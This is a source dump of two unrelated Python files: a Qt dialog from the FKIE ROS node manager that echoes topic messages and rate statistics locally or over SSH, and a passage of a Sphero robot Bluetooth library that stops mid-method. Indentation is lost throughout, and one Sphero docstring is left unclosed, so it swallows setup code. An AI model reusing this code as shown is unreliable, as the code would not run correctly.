echo_dialog.py
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function, unicode_literals
import os
import itertools
import math
import sys
import threading
import time
from datetime import datetime
from python_qt_binding import loadUi
from python_qt_binding.QtCore import Qt, QUrl, QTimer, Signal
from python_qt_binding.QtGui import QIcon, QTextDocument
try:
from python_qt_binding.QtGui import QApplication, QDialog
except Exception:
from python_qt_binding.QtWidgets import QApplication, QDialog
from roslib import message
from genpy.rostime import Time, TVal
import rospy
from . import gui_resources
import fkie_node_manager as nm
from fkie_node_manager_daemon.common import utf8
def isstring(s):
"""Small helper to check whether an object is a string in a way that works
for both Python 2 and 3.
"""
try:
return isinstance(s, basestring)
except NameError:
return isinstance(s, str)
try:
long
except NameError:
# Python 3 has no separate long type; alias it so strify_message() keeps working there
long = int
def _convert_getattr(val, f, t):
"""
Convert attribute types on the fly, if necessary. This is mainly
to convert uint8[] fields back to an array type.
"""
attr = getattr(val, f)
if isstring(attr) and 'uint8[' in t:
return [ord(x) for x in attr]
else:
return attr
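# For illustration: a slot declared as 'uint8[]' arrives in Python 2 as a plain str, so
# _convert_getattr(msg, 'data', 'uint8[]') would turn '\x01\x02\x03' into [1, 2, 3];
# every other field is returned unchanged.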
class EchoDialog(QDialog):
MESSAGE_CHARS_LIMIT = 1000
MESSAGE_LINE_LIMIT = 80
MESSAGE_HZ_LIMIT = 10
MAX_DISPLAY_MSGS = 25
STATISTIC_QUEUE_LEN = 1000
SHOW_BYTES = True
SHOW_JITTER = True
SHOW_STD_DEV = False
SHOW_WINDOW_SIZE = False
'''
This dialog shows the output of a topic.
'''
finished_signal = Signal(str)
'''
finished_signal carries the name of the topic and is emitted when this
dialog is closed.
'''
msg_signal = Signal(object, bool)
'''
msg_signal is emitted when a new message is received.
'''
text_hz_signal = Signal(str)
text_signal = Signal(str)
'''
text_signal is emitted when new text to display is received.
'''
text_error_signal = Signal(str)
'''
text_error_signal is emitted when new error text to display is received.
'''
request_pw = Signal(object)
def __init__(self, topic, msg_type, show_only_rate=False, masteruri=None, use_ssh=False, parent=None):
'''
Creates an input dialog.
@param topic: the name of the topic
@type topic: C{str}
@param msg_type: the type of the topic
@type msg_type: C{str}
@raise Exception: if no topic class was found for the given type
'''
QDialog.__init__(self, parent=parent)
self._masteruri = masteruri
masteruri_str = '' if masteruri is None else '[%s]' % masteruri
echo_dialog_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'EchoDialog.ui')
loadUi(echo_dialog_file, self)
self.setObjectName(' - '.join(['EchoDialog', topic, masteruri_str]))
self.setAttribute(Qt.WA_DeleteOnClose, True)
self.setWindowFlags(Qt.Window)
self.setWindowTitle('%s %s %s' % ('Echo --- ' if not show_only_rate else 'Hz --- ', topic, masteruri_str))
self.resize(900, 512)
self.topic = topic
self.show_only_rate = show_only_rate
self.lock = threading.RLock()
self.last_printed_count = 0
self.msg_t0 = -1.
self.msg_tn = 0
self.times = []
self.bytes = []
self.message_count = 0
self._state_message = ''
self._state_size_message = ''
self._scrapped_msgs = 0
self._scrapped_msgs_sl = 0
self._last_received_ts = 0
self.chars_limit = self.MESSAGE_CHARS_LIMIT
self.receiving_hz = self.MESSAGE_HZ_LIMIT
self.line_limit = self.MESSAGE_LINE_LIMIT
self.max_displayed_msgs = self.MAX_DISPLAY_MSGS
self.digits_after_in_array = 2
self.enabled_message_filter = True
self.field_filter_fn = None
self._latched = False
self._msgs = []
self.filterFrame.setVisible(False)
self.topicControlButton.clicked.connect(self.on_topic_control_btn_clicked)
self.clearButton.clicked.connect(self.on_clear_btn_clicked)
if show_only_rate:
self.filterButton.setVisible(False)
else:
self.filterButton.clicked.connect(self.on_filter_clicked)
self.showStringsCheckBox.toggled.connect(self.on_no_str_checkbox_toggled)
self.maxLenStringComboBox.activated[str].connect(self.combobox_reduce_ch_activated)
self.showArraysCheckBox.toggled.connect(self.on_no_arr_checkbox_toggled)
self.maxDigitsComboBox.activated[str].connect(self.combobox_reduce_digits_activated)
self.enableMsgFilterCheckBox.toggled.connect(self.on_enable_msg_filter_checkbox_toggled)
self.maxLenComboBox.activated[str].connect(self.on_combobox_chars_activated)
self.maxHzComboBox.activated[str].connect(self.on_combobox_hz_activated)
self.displayCountComboBox.activated[str].connect(self.on_combobox_count_activated)
self.combobox_reduce_ch_activated(self.MESSAGE_LINE_LIMIT)
self.on_combobox_chars_activated(self.MESSAGE_CHARS_LIMIT)
self.on_combobox_hz_activated(self.MESSAGE_HZ_LIMIT)
self.on_combobox_count_activated(self.MAX_DISPLAY_MSGS)
self.filterButton.setFocus()
self.display.setReadOnly(True)
self.display.document().setMaximumBlockCount(500)
self._blocks_in_msg = None
self.display.setOpenLinks(False)
self.display.anchorClicked.connect(self._on_display_anchorClicked)
# subscribe to the topic
errmsg = ''
try:
self.__msg_class = message.get_message_class(msg_type)
if not self.__msg_class:
errmsg = "Cannot load message class for [%s]. Did you build messages?" % msg_type
except Exception as e:
self.__msg_class = None
errmsg = "Cannot load message class for [%s]. Did you build messagest?\nError: %s" % (msg_type, utf8(e))
# variables for Subscriber
self.msg_signal.connect(self._append_message)
self.sub = None
# variables for SSH connection
self.ssh_output_file = None
self.ssh_error_file = None
self.ssh_input_file = None
self.text_signal.connect(self._append_text)
self.text_hz_signal.connect(self._append_text_hz)
self._current_msg = ''
self._current_errmsg = ''
self.text_error_signal.connect(self._append_error_text)
# decide, which connection to open
if use_ssh:
self.__msg_class = None
self._on_display_anchorClicked(QUrl(self._masteruri))
elif self.__msg_class is None:
errtxt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">\n%s</pre>' % (errmsg)
self.display.setText('<a href="%s">open using SSH</a>' % (masteruri))
self.display.append(errtxt)
else:
self.sub = rospy.Subscriber(self.topic, self.__msg_class, self._msg_handle)
self.print_hz_timer = QTimer()
self.print_hz_timer.timeout.connect(self._on_calc_hz)
self.print_hz_timer.start(1000)
self._start_time = time.time()
# print "======== create", self.objectName()
#
# def __del__(self):
# print "******* destroy", self.objectName()
# def hideEvent(self, event):
# self.close()
def closeEvent(self, event):
self.print_hz_timer.stop()
if self.sub is not None:
self.sub.unregister()
del self.sub
try:
self.ssh_output_file.close()
self.ssh_error_file.close()
# send Ctrl+C to remote process
self.ssh_input_file.write('%s\n' % chr(3))
self.ssh_input_file.close()
except Exception:
pass
self.finished_signal.emit(self.topic)
if self.parent() is None:
QApplication.quit()
def create_field_filter(self, echo_nostr, echo_noarr):
def field_filter(val):
try:
# fields = val.__slots__
# field_types = val._slot_types
for f, t in zip(val.__slots__, val._slot_types):
if echo_noarr and '[' in t:
continue
elif echo_nostr and 'string' in t:
continue
yield f
except Exception:
pass
return field_filter
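# For illustration: the returned generator yields only the slots that pass the filter. For a
# std_msgs/Header (slots 'seq', 'stamp', 'frame_id' with types 'uint32', 'time', 'string'),
# create_field_filter(echo_nostr=True, echo_noarr=False)(header) yields 'seq' and 'stamp' but
# skips 'frame_id', so strify_message() later omits the string field.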
def on_filter_clicked(self, checked):
self.filterFrame.setVisible(checked)
def on_no_str_checkbox_toggled(self, state):
self.maxLenStringComboBox.setEnabled(state)
self.field_filter_fn = self.create_field_filter(not state, not self.showArraysCheckBox.isChecked())
def on_no_arr_checkbox_toggled(self, state):
self.maxDigitsComboBox.setEnabled(state)
self.field_filter_fn = self.create_field_filter(not self.showStringsCheckBox.isChecked(), not state)
def combobox_reduce_ch_activated(self, ch_txt):
try:
self.line_limit = int(ch_txt)
except ValueError:
try:
self.line_limit = float(ch_txt)
except ValueError:
self.maxLenStringComboBox.setEditText(str(self.line_limit))
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def combobox_reduce_digits_activated(self, ch_txt):
try:
self.digits_after_in_array = int(ch_txt)
except ValueError:
self.digits_after_in_array = None
self.maxDigitsComboBox.setEditText('')
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_enable_msg_filter_checkbox_toggled(self, state):
self.enabled_message_filter = state
self.maxLenComboBox.setEnabled(state)
self.maxHzComboBox.setEnabled(state)
if self.enabled_message_filter:
self.on_combobox_chars_activated(self.maxLenComboBox.currentText(), False)
self.on_combobox_hz_activated(self.maxHzComboBox.currentText(), False)
else:
self.chars_limit = 0
self.receiving_hz = 0
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_chars_activated(self, chars_txt, update_display=True):
if not self.enabled_message_filter:
return
try:
self.chars_limit = int(chars_txt)
except ValueError:
try:
self.chars_limit = float(chars_txt)
except ValueError:
self.maxLenComboBox.setEditText(str(self.chars_limit))
if update_display:
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_hz_activated(self, hz_txt, update_display=True):
if not self.enabled_message_filter:
return
try:
self.receiving_hz = int(hz_txt)
except ValueError:
try:
self.receiving_hz = float(hz_txt)
except ValueError:
self.maxHzComboBox.setEditText(str(self.receiving_hz))
if update_display:
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_count_activated(self, count_txt):
try:
self.max_displayed_msgs = int(count_txt)
self._blocks_in_msg = None
except ValueError:
self.displayCountComboBox.setEditText(str(self.max_displayed_msgs))
def on_clear_btn_clicked(self):
self.display.clear()
with self.lock:
del self._msgs[:]
self.message_count = 0
self._scrapped_msgs = 0
del self.times[:]
del self.bytes[:]
def on_topic_control_btn_clicked(self):
try:
if self.sub is None and self.ssh_output_file is None:
if self.__msg_class:
self.sub = rospy.Subscriber(self.topic, self.__msg_class, self._msg_handle)
self._start_time = time.time()
else:
self._on_display_anchorClicked(QUrl(self._masteruri))
self.topicControlButton.setIcon(QIcon(':/icons/sekkyumu_stop.png'))
else:
if self.sub is not None:
self.sub.unregister()
self.sub = None
elif self.ssh_output_file is not None:
self.ssh_output_file.close()
self.ssh_error_file.close()
self.ssh_output_file = None
self.topicControlButton.setIcon(QIcon(':/icons/sekkyumu_play.png'))
except Exception as e:
rospy.logwarn('Error while stop/play echo for topic %s: %s' % (self.topic, utf8(e)))
def _msg_handle(self, data):
self.msg_signal.emit(data, (data._connection_header['latching'] != '0'))
def _append_message(self, msg, latched, current_time=None, store=True):
'''
Converts the received message to text and appends it to the display.
@param msg: the received message
@type msg: message object
'''
if current_time is None:
current_time = time.time()
self._latched = latched
if store:
with self.lock:
self._msgs.append((msg, current_time))
if len(self._msgs) > 25:
self._msgs.pop(0)
msg_len = -1
if (self.SHOW_BYTES or self.show_only_rate):
buff = None
try:
from cStringIO import StringIO # Python 2.x
buff = StringIO()
import os
msg.serialize(buff)
buff.seek(0, os.SEEK_END)
msg_len = buff.tell()
except ImportError:
from io import BytesIO # Python 3.x
buff = BytesIO()
msg.serialize(buff)
msg_len = buff.getbuffer().nbytes
self._count_messages(current_time, msg_len)
# skip messages if they are received more often than MESSAGE_HZ_LIMIT allows
if self._last_received_ts != 0 and self.receiving_hz != 0:
if current_time - self._last_received_ts < 1.0 / self.receiving_hz:
if (not latched or (latched and current_time - self._start_time > 3.0)):
self._scrapped_msgs += 1
self._scrapped_msgs_sl += 1
return
self._last_received_ts = current_time
if not self.show_only_rate:
# convert message to string and reduce line width to current limit
msg = self.strify_message(msg, field_filter=self.field_filter_fn, fixed_numeric_width=self.digits_after_in_array)
if isinstance(msg, tuple):
msg = msg[0]
msg = self._trim_width(msg)
msg = msg.replace('<', '&lt;').replace('>', '&gt;')
msg_cated = False
if self.chars_limit != 0 and len(msg) > self.chars_limit:
msg = msg[0:self.chars_limit]
msg_cated = True
# create a notification about scrapped messages
if self._scrapped_msgs_sl > 0:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">scrapped %s message because of Hz-settings</pre>' % self._scrapped_msgs_sl
self.display.append(txt)
self._scrapped_msgs_sl = 0
txt = '<pre style="background-color:#FFFCCC; color:#000000;font-family:Fixedsys,Courier; padding:10px;">---------- %s --------------------\n%s</pre>' % (datetime.now().strftime("%d.%m.%Y %H:%M:%S.%f"), msg)
# set the count of the displayed messages on receiving the first message
self._update_max_msg_count(txt)
self.display.append(txt)
if msg_cated:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">message has been cut off</pre>'
self.display.append(txt)
if store:
self._print_status()
def _count_messages(self, ts=None, msg_len=-1):
'''
Counts the received messages. Call this method only when a message is received.
'''
current_time = ts if ts is not None else time.time()
with self.lock:
# time reset
if self.msg_t0 < 0 or self.msg_t0 > current_time:
self.msg_t0 = current_time
self.msg_tn = current_time
self.times = []
self.bytes = []
else:
self.times.append(current_time - self.msg_tn)
if msg_len > -1:
self.bytes.append(msg_len)
self.msg_tn = current_time
# keep only the statistics of the last STATISTIC_QUEUE_LEN messages so as not to run out of memory
if len(self.times) > self.STATISTIC_QUEUE_LEN:
self.times.pop(0)
if len(self.bytes) > self.STATISTIC_QUEUE_LEN:
self.bytes.pop(0)
self.message_count += 1
def _trim_width(self, msg):
'''
reduce line width to current limit
:param msg: the message
:type msg: str
:return: trimmed message
'''
result = msg
if self.line_limit != 0:
a = ''
for l in msg.splitlines():
a = a + (l if len(l) <= self.line_limit else l[0:self.line_limit - 3] + '...') + '\n'
result = a
return result
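# For illustration: with line_limit=80 a 120-character line is shortened to its first 77
# characters plus '...', while lines at or under the limit pass through unchanged.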
def _update_max_msg_count(self, txt):
'''
set the count of the displayed messages on receiving the first message
:param txt: text of the message, which will be added to the document
:type txt: str
'''
if self._blocks_in_msg is None:
td = QTextDocument(txt)
self._blocks_in_msg = td.blockCount()
self.display.document().setMaximumBlockCount(self._blocks_in_msg * self.max_displayed_msgs)
def _on_calc_hz(self):
if rospy.is_shutdown():
self.close()
return
if not self.show_only_rate and time.time() - self._last_received_ts > 1:
# create a notification about scrapped messages
if self._scrapped_msgs_sl > 0:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">scrapped %s message because of Hz-settings</pre>' % self._scrapped_msgs_sl
self._scrapped_msgs_sl = 0
self.display.append(txt)
if self.message_count == self.last_printed_count:
return
with self.lock:
message_rate = ''
message_bytes = ''
message_jitter = ''
message_window = ''
message_std_dev = ''
message_scrapped = ''
sum_times = sum(self.times)
if sum_times == 0:
sum_times = 1
if (self.SHOW_BYTES or self.show_only_rate) and self.bytes:
sum_bytes = sum(self.bytes)
avg = sum_bytes / len(self.bytes)
last = self.bytes[-1]
if avg != last:
message_bytes = "size[ last: %s, avg: %s ]" % (self._normilize_size_print(last), self._normilize_size_print(avg))
else:
message_bytes = "size: %s" % (self._normilize_size_print(last))
byte_rate = float(sum_bytes) / float(sum_times)
message_bytes += " bw: %s/s" % (self._normilize_size_print(byte_rate))
# the code from ROS rostopic
n = len(self.times)
if n < 2:
return
mean = sum_times / n
rate = 1. / mean if mean > 0. else 0
message_rate = "average rate: %.3f" % rate
# min and max
if self.SHOW_JITTER or self.show_only_rate:
max_delta = max(self.times)
min_delta = min(self.times)
message_jitter = "jitter[ min: %.3fs max: %.3fs ]" % (min_delta, max_delta)
# std dev
self.last_printed_count = self.message_count
if self.SHOW_STD_DEV or self.show_only_rate:
std_dev = math.sqrt(sum((x - mean) ** 2 for x in self.times) / n)
message_std_dev = "std dev: %.5fs" % (std_dev)
if self.SHOW_WINDOW_SIZE or self.show_only_rate:
message_window = "window: %s" % (n + 1)
if self._scrapped_msgs > 0:
message_scrapped += "scrapped msgs: %s" % self._scrapped_msgs
self._state_message = ''
self._state_size_message = message_bytes
for msg in [message_rate, message_jitter, message_std_dev, message_window, message_scrapped]:
if msg:
if self._state_message:
self._state_message += ' '
self._state_message += msg
self._print_status()
if self.show_only_rate:
self.display.append("%s %s" % (self._state_message, message_bytes))
def _normilize_size_print(self, size):
if size > 999999:
return "%.2fMiB" % (size / 1048576.0)
if size > 999:
return "%.2fKiB" % (size / 1024.0)
return "%dB" % size
def _print_status(self):
text = '%s messages %s' % (self.message_count, self._state_message)
if self._latched:
text = "[latched] %s" % text
self.statusLabel.setText(text)
self.statusSizeLabel.setText(self._state_size_message)
def _append_text(self, text):
'''
Append echo text received through the SSH.
'''
with self.lock:
self._current_msg += text
if self._current_msg.find('---') != -1:
messages = self._current_msg.split('---')
for m in messages[:-1]:
current_time = time.time()
self._count_messages(current_time)
# limit the displayed text width
m = self._trim_width(m)
txt = '<pre style="background-color:#FFFCCC; color:#000000;font-family:Fixedsys,Courier; padding:10px;">---------- %s --------------------\n%s</pre>' % (datetime.now().strftime("%d.%m.%Y %H:%M:%S.%f"), m)
# set the count of the displayed messages on receiving the first message
self._update_max_msg_count(txt)
self.display.append(txt)
self._current_msg = messages[-1]
self._print_status()
def _append_error_text(self, text):
'''
Append error text received through the SSH.
'''
with self.lock:
self._current_errmsg += text
if self._current_errmsg.find('\n') != -1:
messages = self._current_errmsg.split('\n')
for m in messages[:-1]:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">%s</pre>' % m
self.display.append(txt)
self._current_errmsg = messages[-1]
def _append_text_hz(self, text):
'''
Append text received through the SSH for hz view.
'''
with self.lock:
self._current_msg += text
if self._current_msg.find('\n') != -1:
messages = self._current_msg.split('\n')
for m in messages[:-1]:
txt = '<div style="font-family:Fixedsys,Courier;">%s</div>' % (m)
self.display.append(txt)
self._current_msg = messages[-1]
def _on_display_anchorClicked(self, url, user=None, pw=None):
try:
ok = False
if self.show_only_rate:
self.ssh_input_file, self.ssh_output_file, self.ssh_error_file, ok = nm.ssh().ssh_exec(url.host(), ['rostopic hz %s' % (self.topic)], user, pw, auto_pw_request=True, get_pty=True)
self.statusLabel.setText('connected to %s over SSH' % url.host())
else:
nostr = '--nostr' if not self.showStringsCheckBox.isChecked() else ''
noarr = '--noarr' if not self.showArraysCheckBox.isChecked() else ''
self.ssh_input_file, self.ssh_output_file, self.ssh_error_file, ok = nm.ssh().ssh_exec(url.host(), ['rostopic echo %s %s %s' % (nostr, noarr, self.topic)], user, pw, auto_pw_request=True, get_pty=True)
if ok:
self.display.clear()
target = self._read_output_hz if self.show_only_rate else self._read_output
thread = threading.Thread(target=target, args=((self.ssh_output_file,)))
thread.setDaemon(True)
thread.start()
thread = threading.Thread(target=self._read_error, args=((self.ssh_error_file,)))
thread.setDaemon(True)
thread.start()
elif self.ssh_output_file:
self.ssh_output_file.close()
self.ssh_error_file.close()
except Exception as e:
self._append_error_text('%s\n' % e)
def _read_output_hz(self, output_file):
try:
while not output_file.closed:
text = output_file.read(1)
if text:
self.text_hz_signal.emit(text)
except Exception:
pass
def _read_output(self, output_file):
while not output_file.closed:
text = output_file.read(1)
if text:
self.text_signal.emit(text)
def _read_error(self, error_file):
try:
while not error_file.closed:
text = error_file.read(1)
if text:
self.text_error_signal.emit(text)
except Exception:
pass
# #############################################################################
# PARTS OF genpy/messages.py
# #############################################################################
@classmethod
def strify_message(cls, val, indent='', time_offset=None, current_time=None, field_filter=None, fixed_numeric_width=None, digits_after_in_array=None):
"""
Convert value to string representation
:param val: to convert to string representation. Most likely a Message. ``Value``
:param indent: indentation. If indent is set, then the return value will have a leading \n, ``str``
:param time_offset: if not None, time fields will be displayed
as deltas from time_offset, ``Time``
:param current_time: currently not used. Only provided for API
compatibility. current_time passes in the current time with
respect to the message, ``Time``
:param field_filter: filter the fields that are strified for Messages, ``fn(Message)->iter(str)``
:returns: string (YAML) representation of message, ``str``
"""
type_ = type(val)
if type_ in (int, long, float) and fixed_numeric_width is not None:
if type_ is float:
return ('%.' + str(fixed_numeric_width) + 'f') % val
else:
return ('%d') % val
elif type_ in (int, long, float, bool):
return utf8(val)
elif isstring(val):
# TODO: need to escape strings correctly
if not val:
return "''"
return val
elif isinstance(val, TVal):
if time_offset is not None and isinstance(val, Time):
val = val - time_offset
if fixed_numeric_width is not None:
format_str = '%d'
sec_str = '\n%ssecs: ' % indent + (format_str % val.secs)
nsec_str = '\n%snsecs: ' % indent + (format_str % val.nsecs)
return sec_str + nsec_str
else:
return '\n%ssecs: %s\n%snsecs: %9d' % (indent, val.secs, indent, val.nsecs)
elif type_ in (list, tuple):
if len(val) == 0:
return "[]"
val0 = val[0]
if type(val0) in (int, float) and digits_after_in_array is not None:
list_str = '[' + ''.join(cls.strify_message(v, indent, time_offset, current_time, field_filter, digits_after_in_array) + ', ' for v in val).rstrip(', ') + ']'
return list_str
elif type(val0) in (int, float, str, bool):
# TODO: escape strings properly
return utf8(list(val))
else:
pref = indent + '- '
indent = indent + ' '
return '\n' + '\n'.join([pref + cls.strify_message(v, indent, time_offset, current_time, field_filter, digits_after_in_array) for v in val])
elif isinstance(val, message.Message):
# allow caller to select which fields of message are strified
if field_filter is not None:
fields = list(field_filter(val))
else:
fields = val.__slots__
p = '%s%%s: %%s' % (indent)
ni = ' ' + indent
python_zip = None
if sys.hexversion > 0x03000000: # Python3
python_zip = zip
else: # Python2
python_zip = itertools.izip
slots = []
for f, t in python_zip(val.__slots__, val._slot_types):
if f in fields:
cval = _convert_getattr(val, f, t)
slot_name = f
if isinstance(cval, (list, tuple)):
slot_name = "%s[%d]" % (f, len(cval))
slots.append(p % (utf8(slot_name), cls.strify_message(cval, ni, time_offset, current_time, field_filter, fixed_numeric_width)))
vals = '\n'.join(slots)
if indent:
return '\n' + vals
else:
return vals
else:
return utf8(val) # punt
Sphero.py
"""
Tools for controlling a Sphero 2.0. Sphero is the main class, all others define
parameter or return classes.
Most sphero commands return a Response object, that has two data fields.
`response.success` indicates if the operation was successful, and
`response.data` is any returned data, when appropriate.
"""
from __future__ import print_function
from collections import namedtuple
import struct
import time
import threading
from enum import Enum
from spheropy.BluetoothWrapper import BluetoothWrapper
from spheropy.DataStream import DataStreamManager
from spheropy.Exception import SpheroException
from spheropy.Options import PermanentOptions
from spheropy.Util import nothing, outside_range, int_to_bytes, check_sum, eprint
# Python 3 compatibility
py3 = False
import sys
if sys.version_info > (3,):
py3 = True
def buffer(something):
if isinstance(something,str):
return bytes(something,encoding="ascii")
return bytes(something)
_MSRP = { # taken from sphero api docs
0x00: "OK", # succeeded
0x01: "Error", # non-specific error
0x02: "Checksum Error", # chucksum failure
0x03: "Fragmented Command", # FRAG command
0x04: "Unknown Command", # unknown command id
0x05: "Command unsupported",
0x06: "Bad Message Format",
0x07: "Invalid Paramter values",
0x08: "Failed to execute command",
0x09: "Unknown Device Id",
0x0A: "Ram access need, but is busy",
0x0B: "Incorrect Password",
0x31: "Voltage too low for reflash",
0x32: "Illegal page number",
0x33: "Flash Fail: page did not reprogram correctly",
0x34: "Main application corruptted",
0x35: "Msg state machine timed out"
}
_SOP1 = 0xff
_ANSWER = 0xff
_NO_ANSWER = 0xfe
_ACKNOWLEDGMENT = 0xff
_ASYNC = 0xfe
_CORE = 0x00
_CORE_COMMANDS = {
'PING': 0x01,
'GET VERSIONING': 0x02,
'SET NAME': 0x10,
'GET BLUETOOTH INFO': 0x11,
'GET POWER STATE': 0x20,
'SET POWER NOTIFICATION': 0x21,
'SLEEP': 0x22,
'GET VOLTAGE TRIP': 0x23,
'SET VOLTAGE TRIP': 0x24,
'SET INACT TIMEOUT': 0x25,
'L1': 0x40,
'L2': 0x41,
'ASSIGN TIME': 0x50,
'POLL PACKET TIMES': 0x51
}
_SPHERO = 0x02
_SPHERO_COMMANDS = {
'SET HEADING': 0x01,
'SET STABILIZATION': 0x02,
'SET ROTATION RATE': 0x03,
'GET CHASSIS ID': 0x07,
'SET DATA STRM': 0x11,
'SET COLLISION DETECT': 0x12,
'SET COLOR': 0x20,
'SET BACKLIGHT': 0x21,
'GET COLOR': 0x22,
'ROLL': 0x30,
'BOOST': 0x31,
'SET RAW MOTOR': 0x33,
'MOTION TIMEOUT': 0x34,
'SET PERM OPTIONS': 0x35,
'GET PERM OPTIONS': 0x36,
'SET TEMP OPTIONS': 0x37,
'GET TEMP OPTIONS': 0x38,
}
BluetoothInfo = namedtuple("BluetoothInfo", ['name', 'address', 'color'])
Color = namedtuple('Color', ['r', 'g', 'b'])
MotorValue = namedtuple('MotorValue', ['mode', 'power'])
PacketTime = namedtuple('PacketTime', ['offset', 'delay'])
PowerState = namedtuple('PowerState', [
'recVer', 'power_state', 'batt_voltage', 'num_charges', 'time_since_chg'])
Response = namedtuple('Response', ['success', 'data'])
CollisionMsg = namedtuple('CollisionMsg', [
'x', 'y', 'z', 'axis', 'x_magnitude', 'y_magnitude', 'speed', 'timestamp'])
class MotorState(Enum):
"""
An enum to represent possible motor states
"""
off = 0x00
forward = 0x01
reverse = 0x02
brake = 0x03
ignore = 0x04
class Sphero(object):
"""
Class representing a sphero. Can be used in a `with` block or managed explicitly.
All direct sphero commands will return a `Response` object. where `response.success`
indicates if the command ran successfully, and `response.data` will contain the
data of the response or what went wrong. Other returns will be specified
### Usage:
#!python
from spheropy.Sphero import Sphero
# explicit managment
s = Sphero("Sphero-YWY", "68:86:E7:07:59:71")
s.connect()
s.start() # starts receiving data from sphero
s.roll(50, 0)
s.exit()
# context manager
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.roll(50, 0)
"""
# Static Methods
@classmethod
def find_spheros(cls, tries=5):
"""
Returns a dictionary from names to addresses of all available spheros
`tries` indicates the number of scans to perform before returning results.
### Usage:
#!python
from spheropy.Sphero import Sphero
found_spheros = Sphero.find_spheros()
for key, value in found_spheros.items():
print("Name: {}\tAddress: {}".format(key, value))
"""
return BluetoothWrapper.find_free_devices(tries=tries, regex="[Ss]phero")
# Working
def __init__(self, name, address, port=1, response_time_out=1, number_tries=5):
"""
`name` is mostly used in printing error and information messages; it is useful when working with
more than one sphero.
`address` is the bluetooth address and `port` is the RFCOMM port to use. Every sphero I've used
uses port 1, so unless you have trouble connecting it shouldn't need to change.
`response_time_out` indicates how long to wait in seconds for a response after a message
that expects a response is sent; it does not include sending time.
Any command will be sent up to `number_tries` times until it is successful. This only happens
if a response is expected; otherwise it is sent once. A single command
with a response may block for up to `response_time_out` x `number_tries` seconds.
super(Sphero, self).__init__()
self.bluetooth = BluetoothWrapper(address, port)
""" access to bluetooth wrapper, avoid using """
self.suppress_exception = False
""" suppress_exceptions when used in `with` block """
self._seq_num = 0
self.number_tries = number_tries
""" number of times to try to send a command to sphero """
self._msg_lock = threading.Lock()
self._msg = bytearray(2048)
self._msg[0] = _SOP1
self._response_lock = threading.Lock()
self._response_event_lookup = {}
self._responses = {}
self._response_time_out = response_time_out
# self._recieve_thread = threading.Thread(target=self._recieve_loop) # should only be available after connect
self._data_stream = None
self._asyn_func = {
0x01: self._power_notification,
0x02: self._forward_L1_diag,
0x03: self._sensor_data,
0x07: self._collision_detect,
# 0x0B: self._self_level_result,
# 0x0C: self._gyro_exceeded
}
self._sensor_callback = nothing
self._power_callback = nothing
self._collision_callback = nothing
def __enter__(self):
""" for use in contex manager """
connected = False
tries = 0
while not connected and tries < self.number_tries:
try:
connected = self.bluetooth.connect(suppress_exceptions=True)
except SpheroException:
pass
tries += 1
if tries >= self.number_tries:
raise SpheroException("Unable to connect to sphero")
self.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
""" for use in context manager """
self.disconnect()
return self.suppress_exception
def _recieve_loop(self):
""" recieves data from sphero and parses it"""
packet = bytearray(2)
while self.bluetooth.is_connected():
# state one
try:
# bytearray needs ord
packet[0] = 0
while packet[0] != _SOP1:
packet[0] = ord(self.bluetooth.receive(1))
# state two
packet[1] = ord(self.bluetooth.receive(1))
packet_type = packet[1]
if packet_type == _ACKNOWLEDGMENT: # Sync Packet
self._handle_acknowledge()
elif packet_type == _ASYNC:
self._handle_async()
else:
eprint("Malformed Packet")
except Exception as error:
continue
#eprint(error)
#return
def _handle_acknowledge(self):
"""
Parses response packets from sphero. The response is added to the response
dictionary as a Response tuple, where tuple[0] indicates success and tuple[1]
is the data. The thread waiting on the response is alerted via an event
registered in the response_event_lookup dictionary and is responsible for
parsing the data. All access should be done while holding response_lock.
"""
msrp = ord(self.bluetooth.receive(1))
seq = ord(self.bluetooth.receive(1))
length = ord(self.bluetooth.receive(1))
if length == 0xff:
pass
# raise Exception("NOt Implemented _MSRP: {0}".format(_msrp))
# TODO cover oxff cases
array = self._read(length, offset=3)
